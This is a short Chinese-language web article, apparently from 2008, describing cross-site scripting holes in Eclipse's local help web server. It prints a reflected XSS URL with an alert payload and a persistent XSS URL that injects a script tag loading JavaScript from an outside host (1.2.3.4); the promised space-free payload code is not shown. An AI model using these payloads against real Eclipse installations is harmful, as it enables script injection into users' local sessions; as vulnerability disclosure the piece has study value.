利用跨站脚本攻击Eclipse本地Web服务器
2008-12-06 13:37:06 来源:WEB开发网该漏洞的本质就是本地运行的Web服务器存在XSS问题。 如果用户正在运行IE的话,他们就有可能受到该问题的困扰。
当你单击“Help”菜单的“Help Contents”菜单项的时候,系统将在本地计算机上启动一个Web服务器。经进一步调查发现,这个服务器是Apache Coyote 1.1。乍看起来该Web服务器是从一个伪随机端口启动的,但是实际上有些端口号用的更频繁一些。当然,用于端口号的随机数生成算法不在本文的讨论范围之内,如果您感兴趣的话,可以自己研究一下。
好了,我们的目标只有一个,那就是拿下Eclipse。下面是Eclipse的帮助系统存在反射式XSS漏洞的地址:
http://localhost:port/help/advanced/searchView.jsp?searchWord=a");}alert('xss');>
把上述地址输入浏览器的地址栏,将会看到下面那亲切的画面:
图1 弹出的警示框
下面是存在持久性XSS漏洞的地址:
http://localhost:port/help/advanced/workingSetManager.jsp?operation=add&workingSet=
'%3E%3Cscript%20src%3D'http%3A%2F%2F1.2.3.4%2Fa.js'%3E%3C%2Fscript%3E&hrefs=%2Fcom.adobe.flexbuilder.help.api%2Ftoc.xml&oldName=
当我们在Eclipse上试验反射式XSS攻击时,必须面对这样一个问题,即Eclipse没有把%20和空格符实现自动转换,所以我们要设法避开这个问题,不过这并不太难。那么,怎样写一个没有空格符的JavaScript有效载荷呢?实际上,这很简单。下图是用于有效载荷的示例代码:
更多精彩
赞助商链接